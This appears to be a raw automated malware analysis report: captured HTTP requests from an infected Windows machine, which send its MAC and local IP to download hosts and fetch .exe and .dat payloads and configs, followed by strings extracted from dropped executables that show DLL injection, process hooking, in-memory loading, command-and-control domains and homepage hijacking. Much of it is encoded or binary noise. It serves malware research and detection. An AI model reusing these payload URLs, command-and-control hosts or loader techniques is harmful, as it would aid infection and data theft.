ZRJhvIVRruRMTazQ2ZSPlrTy4BwLMjXdwzez15lN FkMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrerKWM57CHfPE2s0NmUj5a8TazQ2ZSPlr4B7qI/7jDkdq6eEq3M6/X4sYpk l
eK3vxNrNDZlI WstlRiJBQizq9wD3/sE6GlY/b0L4cnvGxdJ5wvSpxjT78TazQ2ZSPlrAM
xzb2vHgefLKZW4QE43vl MjBJd7n7liximT6V4re/E2s0NmUj5awDMc29rx4HnxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlruLEY9WlPXabPujWuMtKVaBI/
YfuliIbec2u2Y3QSKbD6OUxdrytW98V5xGSU6Cbodq73AHbTUINLCwdGx4DRMGOC5cvVPY
kQN2Lg/ySWwyO 49HC2dMSn2FIEXX0xY8fdg6tbtu42d/E2s0NmUj5a2FjW8YTn/PO
<<< skipped >>>


GET /12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: download.cpudln.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 404 Not Found
Date: Mon, 05 May 2014 13:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.5.8
X-Frame-Options: Deny
Content-Length: 1361
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html>.    <head>.        <meta c
harset="utf-8">.        <style type="text/css">.            h
tml, body, #partner, iframe {.                height:100%;.           
     width:100%;.                margin:0;.                padding:0;.
                border:0;.                outline:0;.                f
ont-size:100%;.                vertical-align:baseline;.              
  background:transparent;.            }.            body {.           
     overflow:hidden;.            }.        </style>.        <
;meta content="NOW" name="expires">.        <meta content="index
, follow, all" name="GOOGLEBOT">.        <meta content="index, f
ollow, all" name="robots">.        <!-- Following Meta-Tag fixes
 scaling-issues on mobile devices -->.        <meta content="wid
th=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0
;" name="viewport">.    </head>.    <body>.        <
div id="partner"></div>.        <script type="text/javascr
ipt">.            document.write(.                    '<script t
ype="text/javascript" language="JavaScript"'.                         
     'src="//sedoparking.com/frmpark/'.                              w
indow.location.host   '/'.                              'sedonewreg'. 
                             '/park.js">'.                      '&l
t;\/script>'.            );.        </script>.    </body&g
t;.</html>...
<<< skipped >>>


GET /getconfig/minisite.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.woai310.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Length: 66
Content-Type: application/octet-stream
Last-Modified: Fri, 02 May 2014 10:25:14 GMT
Accept-Ranges: bytes
ETag: "30877cef065cf1:78e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 May 2014 10:26:05 GMT
Expires: Tue, 06 May 2014 10:26:05 GMT
Powered-By-ChinaCache: HIT from CNC-YT-3-3OR.3
Age: 11035
Powered-By-ChinaCache: HIT from CNC-YJ-2-3kA
Connection: keep-alive
[cfg]..url=hXXp://site.minimenhu.com/sh/index.html..rate=100/100....



GET /attachments/advert/201405/20140505190815.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:00 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:15 GMT
ETag: "10016f-25be-4f8a525d745c0"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra73:0 (Cdn Cache Server V2.0)
Connection: close
......00.... ..%......(...0...`..... ......%..........................
......................................................................
..............*49.(28.................................................
......................................................................
..................................................................1FM2
.HR=..................................................................
......................................................................
............................................4=?-5ZaI:gsD..............
......................................................................
......................................................................
..................27<S....-DNS2bm.8ep~=JQ)HPX......................
......................................................................
.....................................................................,
03.,/9.4:A.'JT.)am.6oy./ISv>EM.48<.@EE..........................
......................................................................
..........................................................05e6<I..9
@S*Ub.'[h.$Ub.*T^.-6>}6;B.=AC{7;<...............................
......................................................................
............................................58=. ").AJY.'8@.%Uc..ES..9
F.,Ye..%,[email protected].=BCX498.............................................
......................................................................
..........................,/6.&)5.FP\. ;F.&Wd..9A..27.)S`..!-.08E.
<<< skipped >>>


GET /txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:20 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>


GET /down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 50556
Last-Modified: Wed, 27 Nov 2013 10:31:57 GMT
Connection: keep-alive
ETag: "5295ca1d-c57c"
Accept-Ranges: bytes
...FT .....*.....e.<.8..$.f...f..\.2=.|.`.......Gp...A7..8>..C..
ph.&.9.9. .4 E.U(?g.d.i^..$n=..3M..P.f.x...K..4....Q7O,..... ...#.....
...;.b...g...a.......!..iB..o.G....M..].%2.$.../..-.w.l.....4\........
l.....x..b)Z..c3..P.Oy.\..k..W..ve..g.?v....d.jp.p.......cD.~.R..M....
...}[email protected]....'(&.....5=.5..bM1..g../....;..%[email protected]..
..;.].......tY.[..ZP..~.A...K...d.... .s^...W.%.'@0..$..kc.....M.4.^..
H.F......&.mdB....u'.9.cM6...j\[........qI].NYe...<rt<../....=..
..&.5 ...f5....W.J[m.....1'!.....N..&.3.B....e.....} {h..y..Et....%;.z
....t.....i.^.mk[..,2R...p..P.`..aY.*.H-%}R.GO.3.f..J..->..x....:..
'.l/.VU.....,f.Y.DC....;..]k.R.......{.....n....I...^.Z.(.....Z......L
.....2...J..^U......[......~. lk .........299..'...z....4..%-h...b.P=h
2.P.N.G......)...'.........N.t....Z....O.........g.p!N.l.*.~y....Fr.\.
..S..o..@m..;....n..GN){..........i.....dM\..a.`..f-..m.^..)*...!.....
.&.\..|[email protected]*..# .....*!f.=...Lr......N.....).x
....Wb.9H.Y%,"..cX.....k..4.....2.....1u.....J.5, ..v...T.5....2]O]a..
J.@.=.S../2.........d..31.6.DZ.............m3W4T......&]4.B..G..5...P.
[email protected].....[.o.p..&...*.X..>..[.....<.-d}U.M.-....n
..rg.w<u@d#.*...E:.'6..d..c....f...p..7...V..u..g.`....}...TXc[..:.
..........Fn[?..f6..g..W.T...NkP...&....'.......t(.&....k..F......h.@.
AX....A,...O ...Y$.3..Z...6...........t........3...zr.%.H..xyJ.M.6.n.u
..k,..&l$g.>....Cz....}...%.s._.d......m...JIi.?.3..W.>8..i..l..
d.X..4I...{.....Q..4.....?3I.\..k.......-@=a n.t.V.6.9...4.f{.....
<<< skipped >>>


GET /txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 148828
Last-Modified: Thu, 17 Apr 2014 07:55:19 GMT
Connection: close
ETag: "534f88e7-2455c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnL39DUU4LfAlWqACucvJNley6BpcOtgXvxAGD6yVd
D1fgnTu1gz46nHmlJeS7gVhCvzllN2q6zXSsEMlHGEovC/aPfEggeF50C0VAzlc/ipMMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBH2e0sSQxX6L3YNPrA6SxffkC2j/6HS
dWNx2iFnjmvV1Za/qxG5FKhyH jXHNQt jlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCcK3
NitDljZ7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlr5 6svh39z8
kXrzVqnjK8acTazQ2ZSPlrxNrNDZlI WsV0oGq6efdAcTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrKgLvjirKJq3E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziFX6ZO/vq7NW4sYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7OTs V aE1YKVnrCUGLJaz8TazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWLx KBVdWisj2l
Lwty1A4B7E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oVJ6Oa6pZcW7uByTfYjFs4ofjbZOTR2cpljcZhpxIRluMrSf 27YDFlc9WW9X5M2 HK1
T7k0wJG9loSSFo7oYByaolQZPE f2SIElu1a0HXgdJCg3cKUW92EYKZbvZ6q3fqC2tVIXF
VNOPexGaO KaVDWBItot0B7KRLakOm85PAulfEO9kaOEIRw4Txh6W/juZBxPpHmbly
<<< skipped >>>


GET /down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 52808
Last-Modified: Fri, 04 Apr 2014 09:47:27 GMT
Connection: keep-alive
ETag: "533e7faf-ce48"
Accept-Ranges: bytes
...a.n...k.....X.l...1..'.o...o.._.:..u.G..1..o:|..L..*..}z....3..E.v#
s.]......T...m.5.......A...a..Y.Uv.&....4....k.f..;\`.w......j...e...F
....=Eo.._.l.....d.@..~.5..9..Y.g.....W..[b..4pq#.g<.pb.V....bGc.1d
[email protected]"u.."........!..v..l.g.;u..i......Y.g<.M......
WW.3.U......[A..^)...7.......H.(j....84..p.....h........~.W.......%...
.0..[.bmH=.w...D..Fg...{j.'X.y.x...,....4./W..C`.cC...}...N.l.>R.S.
..VNm........C.......;!.M......X.......q.^....}}...[.6....v*.. ..,..B.
.}.....=.ux..j."$.U.....WUt%.....7e=...x....!8.....Gga...m.^H...n..m.B
....]KY3aL..g..C.e.Om..`.U...kA......?PT]W...9k]".y.0<[.A..y0B....o
XF.....m.........p..b6.#[|&vz8.?X...?....f./..>=...r.....6{...T...|
<.....>...inu~.w....X%].D..........`.,.......7.G}..nE,..8..c....
...=....$o....r..4;.@.. ./.a..8=....l....}.R.}.]s.}VV.........AZ`ilj.d
.2.J..#...M.m.;<....... ............'..m..i....t....g..}...B6.t.9.U
0..D..{.C.......D...(_X....&.y.j....u...V........5.!.Z..w$..?.....}]..
.....[uVh.....o7......GW.~....)i.A...Y.......q..5e'....3.s.m.".S1b{.|.
...c....Kl.....i.9s.'>.v....gc.*..c.d].cu.......yl`..Tl.]..........
...&5d..FP..^..<:UEa..9VMF...i.c#.Q[[email protected]..._...u..2.UQ
C.'...gM3.<m.%...p'..|.B_...i|.......#[email protected].& ..I0.d_.6G
..2..........$....7]Wc$.....("..}..u..<$..r....iq.*T.7...;..A.....?
X.4..s.^;[email protected]...(.WM..B....J... @...uk=.t/.L..h:....F.M.
)Sp....x.x.%v.....0..L...|.4..t.....a.b7"../vzU..&~...u.('..P.UO......
..~.. ........5&..;.....`s6K.........3sT........w{zkyg...f..'s...f
<<< skipped >>>
%original file name%.exe_1040:

.text
`.rdata
@.data
.rsrc
@.fyf
<.SSWh
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
_acmdln
MSVCRT.dll
EXE_temp%x%s
EXE_temp0.exe
EXE_temp1.EXE
EXE_temp2.exe
EXE_temp3.exe
EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
"%"""&"""!!""
.Fj)V
DO*.tnCU
$%c&#'(
j.CjI
%DQ80*f.b
*3x<%Sc
b;.Nj
?456789:;<=
!"#$%&'()* ,-./
0,1'8"5.*2$
\\.\SSDT
@~MSVCRT3
5A937EE-621D-4F66-8C
fit.exhGET
ngKbytes=%d-
%s\Cxnec
Sw -gU|u.Cj{{
d2
g7http:/
fi.Pz`
msvcrt>
}w%dk8V/
zcÁ
j.rPS\
E:\CODE_P~1\p2
9|!3<3[3
D:\Te
%FinA
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
RegFlushKey
InternetCrackUrlA
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
TOnAskForKey
OnAskForKeyT
Visit http://www.abyssmedia.com for more info.
cmd.exe /c
command.com /c
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
GetCPInfo
: :$:(:,:0:4:8:
 -,.4031652,
*)$#"&&%
KWindows
UrlMon
`.data
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
L.iNz
z[^.ZW1
1u.xJ
E/%sT
-.nF*4
-i7u}
H8 %u,O[
b.Yy]
"m.ZGI(
>%uK1>
v-|%s\u
$L.QWF7
@q.kv
.lh3i
.gBk_
_%8xE)
:.dA qz
~gzK%s
]%UYa
0[
i%x^K
&0.IR
V.eeW
kGd%S
X*.QdL
i.zOoz
Z%XHt
1, 0, 3, 916
0, 0, 0, 0
%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
1. 1. 1. 1
0.0.0.0
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe

EXE_temp2.exe_1176:




.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe

EXE_temp3.exe_816:




__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
58lm/temptation.bin
.IUQT
[.aoH
[8~%xs
 .oN7
z.Tl&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
KERNEL32.DLL

EXE_temp3.exe_816_rwx_00350000_0005A000:




SSSSh
__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
ERSION.dll
WINDOWS
Find In FileLib, API[%s]
Find In MemLib, API[%s]
API[%s]
Jmp Address: X
API[%s] CodeSize:%d
%s%s%s
:%d: %s
DNS %s->%d.%d.%d.%d
118.145.16.39
www.iiewl.com
118.145.16.38
www.iojjek.com
host:X
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.1.1
8.8.4.4
xid:X
sizeof(DNS_QUERY):%d
DNS IP : %d.%d.%d.%d
CNAME : %s
Length : %d
LiveTime : %d
Class : %d
Type : %d
Domain:%s
AdditionalCount:%d
NameServerCount:%d
AnswerCount :%d
QuestionCount :%d
rcode:%d
recvfrom ret:%d
sendto ret:%d
dns_query() Use Dns Server: %s
dns_query() iServer:%d
Shell.Dusn
data_len:%d body_len:%d lphdr->len:%d
Tcp Client Get Config Thread Proc.
downtime:M-d-d d:d:d
%a, %d %b %Y %H:%M:%S
get_hostent(%s,X)
1.2.3
chunk exit, chunk.length:%d chunk_size:%d chunk_size_len:%d
, nCopy:%d
Gzip Unpack, hFile:X
recv_over break_mode:%d recv_len/cont_len:%d/%d body_len/file_len:%d/%d down_ok:%d
%s%sX%s
file_len:%d cont_len:%d header_end_len:%d
, size:%d
conn.s:X
lpHost:%s
, errno:%d
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
, ini->ngroup=%d
i:%d len:%d ini->nline:%d
scan_ini ini->ngroup:%d
NtFunID:%4X dwKiFastSystemCall:X
dwKiFastSystemCall:X
ntdll.dll
ZwQueryValueKey
ZwOpenKey
InjectDll type:%u count:%u %s
g_ipcount:%d
ptable->dwNumEntries:%d
%s->Characteristics:X %d AdapterName:%s
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
ip:%s
idx:%d Type:%d %s %s
localhost:%d.%d.%d.%d
%-8s: %d
%-8s: %d.%d.%d.%d
%-8s: X-X-X-X-X-X
index:%d mac_str:%s
xxxxxx
ITA %s->%s
, cmp=%d
kvs.size=%d
lpBaseAddress:x dwReadLen:%d
FileSize:%d
M-d-d d:d:d
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
mswsock.dll
uncompress res:%d des_len:%d
uncompress x:X src_len:%d des_len:%d
uncompress crc:X X
User:%s
GetModuleFileNameW:X
GetModuleFileNameA:X
GetModuleHandleW:X
GetModuleHandleA:X
InitResult:%d
MemLoad szAppModule:%s
pDllMain:X
pMemoryAddress:X
BaseAddress pMemoryAddress:X
CalcTotalImageSize= %d
Not Found Dll: %s
%s ModuleHandle:X
Name:X FirstThunk:X OriginalFirstThunk:X
Frist Import Table:X
No Import Table
GetExeModule:%s
GetExeModule
0.pool.ntp.org
1.pool.ntp.org
2.pool.ntp.org
3.pool.ntp.org
0.gentoo.pool.ntp.org
1.gentoo.pool.ntp.org
2.gentoo.pool.ntp.org
3.gentoo.pool.ntp.org
0.asia.pool.ntp.org
1.asia.pool.ntp.org
2.asia.pool.ntp.org
3.asia.pool.ntp.org
17.82.253.7
203.117.180.36
time.asia.apple.com
64.236.96.53
130.149.17.21
clock.via.net
ntp.nasa.gov
time-a.nist.gov
stdtime.gov.hk
time.buptnet.edu.cn
ntp.rhrk.uni-kl.de
ntp.ipv6.uni-leipzig.de
129.7.1.66
ntp.sjtu.edu.cn
202.120.2.101
time-a.timefreq.bldrdoc.gov
time-b.timefreq.bldrdoc.gov
time-c.timefreq.bldrdoc.gov
utcnist.colorado.edu
d-d-d d:d:d
i:%d [%s] n_errno:%d
Ntp iStart:%d
http://www.iojjek.com/
http://www.iiewl.com/
SendMsg uMsg:%d dwResult:%d,
DownloadUriFromServer url:%s
%d.%d.%d
%d.%d.%d.%d
, bRet:%d
buff.is_down_ok:%d response->code:%d
, ret=%d buffer.body_Len=%d is_down_ok:%d can_break_points_transfer:%d
http://
Muxtex[%d]
%s, m_down_from_server:%d
buffer.length:%d
****:%s
[%d.%d.%d.%d:%d]
(%d):%s
, length:%d
szBackPath:%s
.ELOG
Bind Port:%d
ATL:X
RegQueryValueExA %s
User32.dll
RegOpenKeyExA
ADVAPI32.dll
RegOpenKeyExW
kernel32.dll
MY_RegOpenKeyExA:%s
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
RegOpenKeyExA:%s
software\policies\microsoft\windows nt\dnsclient
RegisterWindowMessageA:%s
NtCreateProcessEx hPrcess:X
NtCreateProcessEx dwParentPid:%d
NtCreateProcessEx ProcessHandle:X ParentProcess:X
dwParentPid:%d
Module:%s
dwRtlUserThreadStart:X
SysVersion:%d.%d.%d
ole32.dll
LoadPE(ole32.dll)
ole32.dll
dnsapi.dll
LoadPE(dnsapi.dll)
dnsapi.dll
wininet.dll
LoadPE(wininet.dll)
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestW
HttpOpenRequestA
wininet.dll
ws2_32.dll
LoadPE(ws2_32.dll)
ws2_32.dll
ntdll.dll
LoadPE(ntdll.dll)
IP:%s,Mac:X-X-X-X-X-X
SendTo NtDeviceIoControlFile Status:X
Status:X
Call NtDeviceIoControlFile, X
RecvFrom NtDeviceIoControlFile Status:X
%m/%d/%y
%H:%M:%S
%I:%M:%S %p
%x %X
Send File:%s
Open File:%s
send_count:%d
Tcp Accept Thread Exit.
:recv_len=%d
Tcp Accept Thread Proc
recv_len:%d
Tcp Accept Thread Start.
diff:%d timeout:%d
AddPeer cid:X TimeOut:%d IsTimeOut:%d
cid:X
~CUdpPeer()
, type:%d size:%d %d crc:X X ver:%d %d
Send SendRecvOK phdr->id:X phdr->type:%d
send_broadcast 0xFFFFFFFF ret:%d
send_broadcast ret:%d
TCP_PORT
UDP_PORT
TCP_PROTO_VER
UDP_PROTO_VER
RandBind port:%d
SetLockTimer index:%d uElapse:%d
Lock index:%d Hash:X Tick:%I64d OldStatus:%d
Keep m_TaskMutex[%d].Name=X
SendKeepPacket index:%d
re send id:X nSend:%d ret:%d to:%d.%d.%d.%d:%d
m_TaskMutex[%d]->res_list.count:%d
OnLockTimeOut m_TaskMutex[%d].Name=X Status:%d lock_perr[%d.%d.%d.%d:%d]
OnKeepTimeOut(%d) nKeepTimeOut:%d
OnRecvOK m_send_list.items:%d id:X
Send ReQueryLock ret:%d
Send QueryLock ret:%d
OnQueryLock %s Index:%d Hash:X
OnReplyLock m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d
OnReplyLock Set m_TaskMutex[%d].Name=X Status=MUTEX_STATUS_LOCK_FAILD
OnReplyLock m_TaskMutex[%d].Name=X Status:%d
OnLockOk m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d
OnReplyLockKeep Status:%d
